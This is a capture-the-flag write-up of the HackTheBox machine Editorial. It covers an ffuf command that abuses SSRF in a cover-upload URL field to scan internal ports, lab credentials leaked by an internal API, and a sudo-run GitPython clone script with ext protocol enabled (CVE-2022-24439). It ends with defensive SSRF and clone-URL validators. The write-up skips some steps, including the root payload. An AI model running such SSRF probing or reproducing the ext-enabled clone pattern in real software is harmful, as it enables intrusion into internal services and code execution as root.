Editorial is an easy-difficulty Linux machine from HackTheBox. It initially deals with manipulating a file upload feature and abusing SSRF to enumerate internal services running on specific ports and to exfiltrate data from an internal API endpoint, which gets us the user flag. Finally, we deal with CVE-2022-24439, an RCE in GitPython versions below 3.1.30, which lets us take over the whole system.
PS C:\Users\0xkujen> nmap -A -Pn 10.129.129.83
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-19 02:57 Arabian Standard Time
NSOCK ERROR [0.2690s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 10.129.129.83
Host is up (0.23s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=10/19%OT=22%CT=1%CU=38554%PV=Y%DS=2%DC=T%G=Y%TM=6712E8
OS:1F%P=i686-pc-windows-windows)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=
OS:A)SEQ(CI=Z%II=I)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54
OS:EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%
OS:W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=
OS:Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y
OS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)I
OS:E(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   125.00 ms 10.10.16.1
2   265.00 ms 10.129.129.83

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.59 seconds
We can see that SSH is open on port 22 and a web application is exposed on port 80. Accessing the web application redirects us to editorial.htb, so let's add that entry to our /etc/hosts file.
Let's try replacing the 'bookurl' with local hostnames to enumerate services running on internal ports. After saving the request to a file, I ran this command: .\ffuf.exe -u http://editorial.htb/upload-cover -X POST -request requestt.txt -w ports.txt -fs 61 and got port 5000. Let's make a request to it and see what we have:
We navigate to the provided file and find this interesting data in it:
{"messages":[{"promotions":{"description":"Retrieve a list of all the promotions in our library.","endpoint":"/api/latest/metadata/messages/promos","methods":"GET"}},{"coupons":{"description":"Retrieve the list of coupons to use in our library.","endpoint":"/api/latest/metadata/messages/coupons","methods":"GET"}},{"new_authors":{"description":"Retrieve the welcome message sended to our new authors.","endpoint":"/api/latest/metadata/messages/authors","methods":"GET"}},{"platform_use":{"description":"Retrieve examples of how to use the platform.","endpoint":"/api/latest/metadata/messages/how_to_use_platform","methods":"GET"}}],"version":[{"changelog":{"description":"Retrieve a list of all the versions and updates of the api.","endpoint":"/api/latest/metadata/changelog","methods":"GET"}},{"latest":{"description":"Retrieve the last version of api.","endpoint":"/api/latest/metadata","methods":"GET"}}]}
We can see that we have some API endpoints. We access /api/latest/metadata/messages/authors like we did previously and we get some really amazing data:
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}
We got SSH credentials! Let's use those and get our user flag:
dev@editorial:~$ id
uid=1001(dev) gid=1001(dev) groups=1001(dev)
dev@editorial:~$ cat user.txt
1b090a893289c3******************
dev@editorial:~$
Privilege Escalation to root
We can see from our home directory that there's another 'prod' user. There is also a '.git' directory inside the 'apps' directory in 'dev''s home, so let's check the git diffs for any other credentials:
prod@editorial:/home/dev/apps/.git$ sudo -l
[sudo] password for prod:
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
prod@editorial:/home/dev/apps/.git$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
prod@editorial:/home/dev/apps/.git$
We can see that we can run the above script as root. Checking this script further, we can see that the GitPython it uses is vulnerable to CVE-2022-24439. So let's get our root:
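Both footholds on this box come down to a server fetching or cloning a URL that the user fully controls: the cover-upload 'bookurl' reached 127.0.0.1:5000, and clone_prod_change.py hands sys.argv[1] to GitPython with protocol.ext switched on. The following is an added example written for this writeup, not code from the box or from GitPython, showing how each of those sinks would be guarded on the defender's side. The function names (is_safe_fetch_url, is_safe_clone_url, safe_clone) and the allow-listed clone hosts are my own constructions.

```python
"""Input validation for the two URL sinks seen on this box.

Added example, not code from the Editorial box or from the writeup. It shows
the defender-side fix for both findings above: the cover-upload 'bookurl'
that let us reach 127.0.0.1:5000 (SSRF), and the sudo-able
clone_prod_change.py that passes a caller-controlled URL to GitPython with
protocol.ext enabled. The allow-listed clone hosts are constructed placeholders.
"""
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_FETCH_SCHEMES = {"http", "https"}
ALLOWED_CLONE_SCHEMES = {"https", "ssh"}
# Constructed allow-list: the hosts the production clone job is meant to pull from.
ALLOWED_CLONE_HOSTS = {"github.com", "git.editorial.internal"}


def resolve_all(hostname):
    """Every address a hostname resolves to, or [] if it does not resolve.

    Literal addresses are parsed directly, so no DNS lookup is needed for them.
    """
    try:
        return [ipaddress.ip_address(hostname)]
    except ValueError:
        pass
    try:
        infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    # info[4][0] is the textual address; drop any IPv6 scope suffix ("%eth0").
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def is_safe_fetch_url(url):
    """SSRF guard for a user-supplied URL the server will fetch (the 'bookurl').

    Rejects non-HTTP schemes, embedded credentials, unresolvable names, and any
    name that resolves to a non-global address: loopback such as 127.0.0.1:5000,
    RFC 1918 ranges, link-local 169.254.0.0/16 (cloud metadata), and so on.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_FETCH_SCHEMES or not parsed.hostname:
        return False
    if parsed.username is not None or parsed.password is not None:
        return False
    addrs = resolve_all(parsed.hostname)
    if not addrs:
        return False
    # Every resolved address must be globally routable, not just the first one.
    return all(addr.is_global for addr in addrs)


def is_safe_clone_url(url):
    """Guard for the repository URL handed to clone_prod_change.py.

    Only https:// and ssh:// URLs to allow-listed hosts pass. Anything starting
    with '-' is refused because git would read it as an option, and schemes such
    as ext:: (the vector behind CVE-2022-24439) fail because they are not on
    the allow-list.
    """
    if not url or url.startswith("-"):
        return False
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_CLONE_SCHEMES:
        return False
    return parsed.hostname in ALLOWED_CLONE_HOSTS


def safe_clone(url, dest="new_changes"):
    """Clone only after validation, and without re-enabling protocol.ext.

    GitPython is imported lazily so the validators above run without it.
    """
    if not is_safe_clone_url(url):
        raise ValueError(f"refusing to clone {url!r}")
    from git import Repo  # GitPython, the library the original script uses
    # Unlike the original, no multi_options=["-c protocol.ext.allow=always"].
    return Repo.clone_from(url, dest)


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:5000/api/latest/metadata",
                      "http://8.8.8.8/cover.png"):
        verdict = "allowed" if is_safe_fetch_url(candidate) else "blocked"
        print(f"fetch {candidate}: {verdict}")
    for candidate in ("https://github.com/org/repo.git", "ext::example", "-c"):
        verdict = "allowed" if is_safe_clone_url(candidate) else "blocked"
        print(f"clone {candidate}: {verdict}")
```

Two caveats on the design. The SSRF check resolves the name once and judges every returned address; the fetch that follows should connect to one of those checked addresses rather than resolving the name a second time, otherwise a short-TTL record can pass the check and point somewhere else at connect time. For the clone job, the validator is a belt-and-braces measure on top of the real fix, which is upgrading GitPython past the version the writeup names as vulnerable (below 3.1.30) and dropping the option that re-enables the ext protocol.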